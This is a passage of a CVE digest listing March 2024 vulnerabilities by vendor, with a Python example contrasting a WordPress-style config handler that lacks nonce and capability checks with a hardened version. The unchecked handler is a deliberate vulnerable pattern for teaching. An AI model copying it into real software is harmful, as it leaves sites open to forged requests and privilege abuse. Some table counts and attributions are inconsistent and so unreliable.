CVE-2023-4731 | Medium | 4.3 | | 2024-03-12 | The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the init_endpoint() function hooked via 'init' in versions up to, and including, 4.4.
CVE-2023-4729 | Medium | 4.3 | | 2024-03-12 | The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the publish_lp() function hooked via an AJAX action in versions up to, and including, 4.4.
CVE-2023-4728 | Medium | 4.3 | | 2024-03-12 | The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the publish_lp() function hooked via an AJAX action in versions up to, and including, 4.4.
CVE-2023-4629 | Medium | 4.3 | | 2024-03-12 | The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the save_config() function in versions up to, and including, 4.3.
CVE-2023-4628 | Medium | 4.3 | | 2024-03-12 | The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the ladiflow_save_hook() function in versions up to, and including, 4.4.
CVE-2023-4627 | Medium | 4.3 | | 2024-03-12 | The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_config() function in versions up to, and including, 4.4.
CVE-2023-4626 | Medium | 4.3 | | 2024-03-12 | The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ladiflow_save_hook() function in versions up to, and including, 4.3.
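
The LadiApp entries above pair two distinct missing checks on the same handlers (a nonce check against CSRF, and a capability check for authorization), and the DedeCMS section earlier lists twenty admin scripts with the same CSRF defect. The block below is an added example in Python, not LadiApp, DedeCMS or WordPress code, of a config-save handler with neither check beside one with both, using a nonce scheme modelled on WordPress's (HMAC over a time tick, the user and the action; valid for the current and previous half-window) and a role-to-capability table. The server secret, roles, session and request dictionaries are constructed for the example; a real plugin would call the framework's own nonce and capability functions.

```python
import hashlib
import hmac
import time

# Assumption: a per-install secret, playing the role of WordPress's salts.
SERVER_SECRET = b"constructed-per-install-secret"
NONCE_LIFETIME = 12 * 60 * 60  # seconds; the scheme accepts two half-windows


def _tick(now: float) -> int:
    # Nonces are checked against the current and the previous half-window, so a
    # nonce stays valid for between 12 and 24 hours depending on when it was issued.
    return int(now // (NONCE_LIFETIME / 2))


def _nonce_for(tick: int, user_id: int, action: str) -> str:
    msg = f"{tick}|{action}|{user_id}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()[:16]


def create_nonce(user_id: int, action: str, now=None) -> str:
    """Issue a nonce bound to this user and this action."""
    now = time.time() if now is None else now
    return _nonce_for(_tick(now), user_id, action)


def verify_nonce(nonce: str, user_id: int, action: str, now=None) -> bool:
    """Accept a nonce from the current or previous tick; compare in constant time."""
    now = time.time() if now is None else now
    tick = _tick(now)
    return any(
        hmac.compare_digest(nonce.encode(), _nonce_for(tick - age, user_id, action).encode())
        for age in (0, 1)
    )


# Constructed role table; "manage_options" is the capability the handler needs.
ROLE_CAPABILITIES = {
    "administrator": {"manage_options"},
    "subscriber": set(),
}


def save_config_unchecked(session: dict, request: dict, config: dict):
    """Handler with neither check: any logged-in user can rewrite the config, and
    any cross-site page that makes the user's browser send this request can too."""
    config.update(request["config"])
    return 200, "saved"


def save_config_hardened(session: dict, request: dict, config: dict, now=None):
    """Authorization first (capability), then request provenance (nonce).

    Both are needed: the capability check alone still lets a forged request
    ride on an administrator's session; the nonce alone still lets a
    low-privileged account call the handler directly.
    """
    user = session["user"]
    if "manage_options" not in ROLE_CAPABILITIES.get(user["role"], set()):
        return 403, "missing capability"
    if not verify_nonce(request.get("_nonce", ""), user["id"], "save_config", now):
        return 403, "invalid nonce"
    config.update(request["config"])
    return 200, "saved"
```

The nonce must be bound to the action as well as the user, otherwise a nonce issued for a harmless form can be replayed against `save_config`; and the capability check comes first so that unauthorized callers learn nothing about nonce validity.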

SAP · 7 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-22127 | Critical | 9.1 | | 2024-03-12 | SAP NetWeaver Administrator AS Java (Administrator Log Viewer plug-in) - version 7.50, allows an attacker with high privileges to upload potentially dangerous files which leads to command injection vulnerability.
CVE-2024-27902 | Medium | 5.4 | | 2024-03-12 | Applications based on SAP GUI for HTML in SAP NetWeaver AS ABAP - versions 7.89, 7.93, do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. A successful attack can allow a malicious atta…
CVE-2024-28163 | Medium | 5.3 | | 2024-03-12 | Under certain conditions, Support Web Pages of SAP NetWeaver Process Integration (PI) - versions 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on In…
CVE-2024-25645 | Medium | 5.3 | | 2024-03-12 | Under certain condition SAP NetWeaver (Enterprise Portal) - version 7.50 allows an attacker to access information which would otherwise be restricted causing low impact on confidentiality of the application and with no impact on Integrity…
CVE-2024-25644 | Medium | 5.3 | | 2024-03-12 | Under certain conditions SAP NetWeaver WSRM - version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application…
CVE-2024-22133 | Medium | 4.6 | | 2024-03-12 | SAP Fiori Front End Server - version 605, allows altering of approver details on the read-only field when sending leave request information.
CVE-2024-27900 | Medium | 4.3 | | 2024-03-12 | Due to missing authorization check, attacker with business user account in SAP ABAP Platform - version 758, 795, can change the privacy setting of job templates from shared to private.

Sciener · 7 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-7017 | Critical | 9.8 | | 2024-03-15 | Sciener locks' firmware update mechanism does not authenticate or validate firmware updates if passed to the lock through the Bluetooth Low Energy service.
CVE-2023-7006 | Critical | 9.1 | | 2024-03-15 | The unlockKey character in a lock using Sciener firmware can be brute forced through repeated challenge requests, compromising the lock's integrity.
CVE-2023-7009 | High | 8.2 | | 2024-03-15 | Some Sciener-based locks support plaintext message processing over Bluetooth Low Energy, allowing unencrypted malicious commands to be passed to the lock.
CVE-2023-7007 | High | 8.2 | | 2024-03-15 | Sciener server does not validate connection requests from the GatewayG2, allowing an impersonation attack that provides the attacker the unlockKey field.
CVE-2023-6960 | High | 7.5 | | 2024-03-15 | TTLock App virtual keys and settings are only deleted client side and, if preserved, can still access the lock after their intended deletion.
CVE-2023-7003 | Medium | 6.8 | | 2024-03-15 | The AES key utilized in the pairing process between a lock using Sciener firmware and a wireless keypad is not unique, and can be reused to compromise other locks using the Sciener firmware.
CVE-2023-7004 | Medium | 6.5 | | 2024-03-15 | The TTLock App does not employ proper verification procedures to ensure that it is communicating with the expected device, allowing for connection to a device that spoofs the MAC address of a lock, which compromises the legitimate locks in…

Beaverbuilder · 6 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1080 | Medium | 6.4 | | 2024-03-13 | The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the heading tag in all versions up to, and including, 2.7.4.4 due to insufficient input sanitization and output escap…
CVE-2024-1074 | Medium | 6.4 | | 2024-03-13 | The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the audio widget 'link_url' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization an…
CVE-2024-0897 | Medium | 6.4 | | 2024-03-13 | The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image URL parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escap…
CVE-2024-0896 | Medium | 6.4 | | 2024-03-13 | The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button link parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output esc…
CVE-2024-1038 | Medium | 5.4 | | 2024-03-13 | The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to DOM-Based Reflected Cross-Site Scripting via a 'playground.wordpress.net' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input s…
CVE-2024-0871 | Medium | 5.4 | | 2024-03-13 | The Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Icon Widget 'fl_builder_data[node_preview][link]' and 'fl_builder_data[settings][link_target]' parameters in all versions up to, and including, 2…

Tenda · 6 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2490 | High | 8.8 | | 2024-03-15 | A vulnerability classified as critical was found in Tenda AC18 15.03.05.05.
CVE-2024-2489 | High | 8.8 | | 2024-03-15 | A vulnerability classified as critical has been found in Tenda AC18 15.03.05.05.
CVE-2024-2488 | High | 8.8 | | 2024-03-15 | A vulnerability was found in Tenda AC18 15.03.05.05.
CVE-2024-2487 | High | 8.8 | | 2024-03-15 | A vulnerability was found in Tenda AC18 15.03.05.05.
CVE-2024-2486 | High | 8.8 | | 2024-03-15 | A vulnerability was found in Tenda AC18 15.03.05.05.
CVE-2024-2485 | High | 8.8 | | 2024-03-15 | A vulnerability was found in Tenda AC18 15.03.05.05 and classified as critical.

Delinea · 5 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25652 | High | 7.6 |  | 2024-03-14 | In Delinea PAM Secret Server 11.4, it is possible for a user assigned "Administer Reports" permission and/or with access to Report functionality via UNLIMITED ADMIN MODE (with access to the Report functionality) to gain unauthorized access…
CVE-2024-25649 | Medium | 6.7 |  | 2024-03-14 | In Delinea PAM Secret Server 11.4, it is possible for an attacker (with Administrator access to the Secret Server machine) to read the following data from a memory dump: the decrypted master key, database credentials (when SQL Server Authe…
CVE-2024-25650 | Medium | 5.9 |  | 2024-03-14 | Insecure key exchange between Delinea PAM Secret Server 11.4 and the Distributed Engine 8.4.3 allows a PAM administrator to obtain the Symmetric Key (used to encrypt RabbitMQ messages) via crafted payloads to the /pre-authenticate, /authen…
CVE-2024-25651 | Medium | 5.3 |  | 2024-03-14 | User enumeration can occur in the Authentication REST API in Delinea PAM Secret Server 11.4.
CVE-2024-25653 | Medium | 4.3 |  | 2024-03-14 | Broken Access Control in the Report functionality of Delinea PAM Secret Server 11.4 allows unprivileged users, when Unlimited Admin Mode is enabled, to view system reports and modify custom reports via the Report functionality in the Web U…

Dell · 5 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0161 | High | 7.2 |  | 2024-03-13 | Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an Improper SMM communication buffer verification vulnerability.
CVE-2024-0163 | Medium | 5.3 |  | 2024-03-13 | Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain a TOCTOU race condition vulnerability.
CVE-2024-0162 | Medium | 5.3 |  | 2024-03-13 | Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an Improper SMM communication buffer verification vulnerability.
CVE-2024-0173 | Low | 3.8 |  | 2024-03-13 | Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an improper parameter initialization vulnerability.
CVE-2024-0154 | Low | 3.8 |  | 2024-03-13 | Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an improper parameter initialization vulnerability.

Discourse · 5 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27100 | Medium | 6.5 |  | 2024-03-15 | Discourse is an open source platform for community discussion.
CVE-2024-27085 | Medium | 6.5 |  | 2024-03-15 | Discourse is an open source platform for community discussion.
CVE-2024-28242 | Medium | 5.3 |  | 2024-03-15 | Discourse is an open source platform for community discussion.
CVE-2024-24827 | Medium | 5.3 |  | 2024-03-15 | Discourse is an open source platform for community discussion.
CVE-2024-24748 | Medium | 5.3 |  | 2024-03-15 | Discourse is an open source platform for community discussion.

Mattermost · 5 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2450 | High | 8.8 |  | 2024-03-15 | Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to correctly verify account ownership when switching from email to SAML authentication, allowing an authenticated attacker to take…
CVE-2024-2445 | Medium | 6.1 |  | 2024-03-15 | Mattermost Jira plugin versions shipped with Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to escape user-controlled outputs when generating HTML pages, which allows an attacke…
CVE-2024-2446 | Medium | 4.3 |  | 2024-03-15 | Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to limit the number of @-mentions processed per message, allowing an authenticated attacker to crash the client applications of ot…
CVE-2024-24975 | Low | 3.5 |  | 2024-03-15 | Uncontrolled Resource Consumption in Mattermost Mobile versions before 2.13.0 fails to limit the size of the code block that will be processed by the syntax highlighter, allowing an attacker to send a very large code block and crash the mo…
CVE-2024-28053 | Low | 3.1 |  | 2024-03-15 | Resource Exhaustion in Mattermost Server versions 8.1.x before 8.1.10 fails to limit the size of the payload that can be read and parsed allowing an attacker to send a very large email payload and crash the server.

Mitsubishi Electric Corporation · 5 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1917 | Critical | 9.8 |  | 2024-03-15 | Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially c…
CVE-2024-1916 | Critical | 9.8 |  | 2024-03-15 | Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially c…
CVE-2024-1915 | Critical | 9.8 |  | 2024-03-15 | Incorrect Pointer Scaling vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially crafte…
CVE-2024-0803 | Critical | 9.8 |  | 2024-03-15 | Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially c…
CVE-2024-0802 | Critical | 9.8 |  | 2024-03-15 | Incorrect Pointer Scaling vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to read arbitrary information from a target product or execute malicious co…

Ni · 5 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-23612 | High | 7.8 |  | 2024-03-11 | An improper error handling vulnerability in LabVIEW may result in remote code execution.
CVE-2024-23611 | High | 7.8 |  | 2024-03-11 | An out of bounds write due to a missing bounds check in LabVIEW may result in remote code execution.
CVE-2024-23610 | High | 7.8 |  | 2024-03-11 | An out of bounds write due to a missing bounds check in LabVIEW may result in remote code execution.
CVE-2024-23609 | High | 7.8 |  | 2024-03-11 | An improper error handling vulnerability in LabVIEW may result in remote code execution.
CVE-2024-23608 | High | 7.8 |  | 2024-03-11 | An out of bounds write due to a missing bounds check in LabVIEW may result in remote code execution.

Open-metadata · 5 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28255 | Critical | 9.8 |  | 2024-03-15 | OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration.
CVE-2024-28253 | Critical | 9.4 |  | 2024-03-15 | OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration.
CVE-2024-28848 | High | 8.8 |  | 2024-03-15 | OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration.
CVE-2024-28847 | High | 8.8 |  | 2024-03-15 | OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration.
CVE-2024-28254 | High | 8.8 |  | 2024-03-15 | OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration.

Themeisle · 5 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2126 | Medium | 6.4 |  | 2024-03-13 | The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Registration Form widget in all versions up to, and including, 2.10.32 due to insufficient input sanitization and output escaping.
CVE-2024-1684 | Medium | 6.4 |  | 2024-03-13 | The Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the contact form file field CSS metabox in all versions up to, and including, 2.6.3 due to i…
CVE-2024-1499 | Medium | 6.4 |  | 2024-03-13 | The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pricing Table widget in the $settings['title_tags'] parameter in all versions up to, and including, 2.10.30 due to insufficient input san…
CVE-2024-1497 | Medium | 6.4 |  | 2024-03-13 | The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form widget addr2_width attribute in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping.
CVE-2024-1691 | Medium | 6.1 |  | 2024-03-13 | The Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file upload form, which allows SVG uploads, in all versions up to, and including, 2.6.3…

Webtechstreet · 5 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1358 | High | 8.8 |  | 2024-03-13 | The Elementor Addon Elements plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.12.12 via the render function.
CVE-2024-1422 | Medium | 6.4 |  | 2024-03-13 | The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the modal popup widget's effect setting in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output esca…
CVE-2024-1393 | Medium | 6.4 |  | 2024-03-13 | The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'icon_align' attribute of the Content Switcher widget in all versions up to, and including, 1.12.12 due to insufficient input sanitizati…
CVE-2024-1392 | Medium | 6.4 |  | 2024-03-13 | The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button1_icon' attribute of the Dual Button widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization…
CVE-2024-1391 | Medium | 6.4 |  | 2024-03-13 | The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘eae_custom_overlay_switcher’ attribute of the Thumbnail Slider widget in all versions up to, and including, 1.12.12 due to insufficient…

Yooooomi · 5 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28194 | Critical | 9.1 |  | 2024-03-13 | your_spotify is an open source, self hosted Spotify tracking dashboard.
CVE-2024-28195 | High | 8.1 |  | 2024-03-13 | your_spotify is an open source, self hosted Spotify tracking dashboard.
CVE-2024-28193 | Medium | 6.5 |  | 2024-03-13 | your_spotify is an open source, self hosted Spotify tracking dashboard.
CVE-2024-28196 | Medium | 6.5 |  | 2024-03-13 | your_spotify is an open source, self hosted Spotify tracking dashboard.
CVE-2024-28192 | Medium | 5.3 |  | 2024-03-13 | your_spotify is an open source, self hosted Spotify tracking dashboard.

Apple · 4 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-42938 | High | 7.8 |  | 2024-03-14 | A logic issue was addressed with improved checks.
CVE-2024-23300 | High | 7.8 |  | 2024-03-12 | A use-after-free issue was addressed with improved memory management.
CVE-2024-23298 | Medium | 5.5 |  | 2024-03-15 | A logic issue was addressed with improved state management.
CVE-2024-1221 | Low | 3.1 |  | 2024-03-14 | This vulnerability potentially allows files on a PaperCut NG/MF server to be exposed using a specifically formed payload against the impacted API endpoint.

Badger Meter · 4 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1301 | Critical | 9.8 |  | 2024-03-12 | SQL injection vulnerability in Badger Meter Monitool affecting versions 4.6.3 and earlier.
CVE-2024-1302 | High | 7.3 |  | 2024-03-12 | Information exposure vulnerability in Badger Meter Monitool affecting versions up to 4.6.3 and earlier.
CVE-2024-1303 | Medium | 6.5 |  | 2024-03-12 | Incorrectly limiting the path to a restricted directory vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier.
CVE-2024-1304 | Medium | 6.3 |  | 2024-03-12 | Cross-site scripting vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier.

Brizy · 4 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1311 | High | 8.8 |  | 2024-03-13 | The Brizy – Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the storeImages function in all versions up to, and including, 2.4.40.
CVE-2024-1296 | Medium | 6.4 |  | 2024-03-13 | The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block upload in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping on user suppli…
CVE-2024-1293 | Medium | 6.4 |  | 2024-03-13 | The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the embedded media custom block in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping.
CVE-2024-1291 | Medium | 6.4 |  | 2024-03-13 | The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown URL parameter in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping.

Exclusiveaddons · 4 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2028 | Medium | 6.4 |  | 2024-03-13 | The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Covid-19 Stats Widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping.
CVE-2024-1414 | Medium | 6.4 |  | 2024-03-13 | The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Call To Action widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping.
CVE-2024-1413 | Medium | 6.4 |  | 2024-03-13 | The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown Timer widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping.
CVE-2024-1234 | Medium | 6.4 |  | 2024-03-13 | The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via data attribute in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping.

Fortra · 4 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25153 | Critical | 9.8 |  | 2024-03-13 | A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request.
CVE-2024-25155 | High | 7.2 |  | 2024-03-13 | In FileCatalyst Direct 3.8.8 and earlier through 3.8.6, the web server does not properly sanitize illegal characters in a URL which is then displayed on a subsequent error page.
CVE-2024-25156 | Medium | 6.5 |  | 2024-03-14 | A path traversal vulnerability exists in GoAnywhere MFT prior to 7.4.2 which allows attackers to circumvent endpoint-specific permission checks in the GoAnywhere Admin and Web Clients.
CVE-2024-25154 | Medium | 5.3 |  | 2024-03-13 | Improper URL validation leads to path traversal in FileCatalyst Direct 3.8.8 and earlier allowing an encoded payload to cause the web server to return files located outside of the web root which may lead to data leakage.

Opentext · 4 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-38534 | High | 8.6 |  | 2024-03-13 | Improper authentication vulnerability in OpenText™ Exceed Turbo X affecting versions 12.5.0 and 12.5.1.
CVE-2023-38536 | Medium | 6.4 |  | 2024-03-13 | HTML injection in OpenText™ Exceed Turbo X affecting version 12.5.1.
CVE-2023-7248 | Medium | 5.0 |  | 2024-03-15 | Certain functionality in OpenText Vertica Management console might be prone to bypass via crafted requests. The vulnerability would affect one of Vertica’s authentication functionalities by allowing specially crafted requests and sequenc…
CVE-2023-38535 | Medium | 4.7 |  | 2024-03-13 | Use of Hard-coded Cryptographic Key vulnerability in OpenText™ Exceed Turbo X affecting versions 12.5.1 and 12.5.2.

Red Hat · 4 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2182 | Medium | 6.5 |  | 2024-03-12 | A flaw was found in the Open Virtual Network (OVN).
CVE-2023-6725 | Medium | 5.5 |  | 2024-03-15 | An access-control flaw was found in the OpenStack Designate component where private configuration information including access keys to BIND were improperly made world readable.
CVE-2024-1441 | Medium | 5.5 |  | 2024-03-11 | An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array.
CVE-2024-1979 | Low | 3.5 |  | 2024-03-13 | A vulnerability was found in Quarkus.

Wpwax · 4 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2006 | High | 8.8 |  | 2024-03-13 | The Post Grid, Slider & Carousel Ultimate – with Shortcode, Gutenberg Block & Elementor Widget plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.6.7 via deserialization of untrusted input in…
CVE-2024-1951 | High | 7.5 |  | 2024-03-13 | The Logo Showcase Ultimate – Logo Carousel, Logo Slider & Logo Grid plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8 via deserialization via shortcode of untrusted input.
CVE-2024-1950 | High | 7.5 |  | 2024-03-13 | The Product Carousel Slider & Grid Ultimate for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.9.7 via deserialization of untrusted input via shortcode.
CVE-2023-50886 | Medium | 4.3 |  | 2024-03-15 | Cross-Site Request Forgery (CSRF), Incorrect Authorization vulnerability in wpWax Legal Pages. This issue affects Legal Pages: from n/a through 1.3.7.

Arcserve · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0799 | Critical | 9.8 |  | 2024-03-13 | An authentication bypass vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in the edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.EdgeLoginServiceImpl.doLogin() function within wizardLogin.
CVE-2024-0800 | High | 8.8 |  | 2024-03-13 | A path traversal vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.servlet.ImportNodeServlet.
CVE-2024-0801 | High | 7.5 |  | 2024-03-13 | A denial of service vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in ASNative.dll.

Cms Made Simple · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1527 | Critical | 9.8 |  | 2024-03-12 | Unrestricted file upload vulnerability in CMS Made Simple, affecting version 2.2.14.
CVE-2024-1529 | High | 7.4 |  | 2024-03-12 | Vulnerability in CMS Made Simple 2.2.14, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /admin/adduser.php, in multiple parameters.
CVE-2024-1528 | High | 7.4 |  | 2024-03-12 | CMS Made Simple version 2.2.14, does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /admin/moduleinterface.php, in multiple parameters.

Debian · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-26614 | Medium | 5.5 |  | 2024-03-11 | In the Linux kernel, the following vulnerability has been resolved: tcp: make sure init the accept_queue's spinlocks once When I run syz's reproduction C program locally, it causes the following issue: pvqspinlock: lock 0xffff9d181cd5c66…
CVE-2023-52489 | Medium | 4.7 |  | 2024-03-11 | In the Linux kernel, the following vulnerability has been resolved: mm/sparsemem: fix race in accessing memory_section->usage The below race is observed on a PFN which falls into the device memory region with the system memory configurat…
CVE-2023-52492 | Medium | 4.4 |  | 2024-03-11 | In the Linux kernel, the following vulnerability has been resolved: dmaengine: fix NULL pointer in channel unregistration function __dma_async_device_channel_register() can fail.

Hammadh · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1772 | High | 8.8 |  | 2024-03-13 | The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.6.4 via deserialization of untrusted input from the play_podcast_dat…
CVE-2024-0828 | Medium | 5.4 |  | 2024-03-13 | The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including…
CVE-2024-0827 | Medium | 4.3 |  | 2024-03-13 | The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.4.

Livemesh · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25598 | Medium | 6.5 |  | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Livemesh Livemesh Addons for Elementor allows Stored XSS. This issue affects Livemesh Addons for Elementor: from n/a through 8.3.
CVE-2024-27986 | Medium | 6.5 |  | 2024-03-14 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Livemesh Elementor Addons by Livemesh allows Stored XSS. This issue affects Elementor Addons by Livemesh: from n/a through 8.3.5.
CVE-2024-2079 | Medium | 6.4 |  | 2024-03-13 | The WPBakery Page Builder Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'per_line_mobile' shortcode in all versions up to, and including, 3.8.1 due to insufficient input sanitization…

Metagauss · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1321 | Medium | 5.3 |  | 2024-03-13 | The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 3.4.2.
CVE-2024-1127 | Medium | 4.3 |  | 2024-03-13 | The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the booking_export_all() function in all versions up to, and including, 3.4.1.
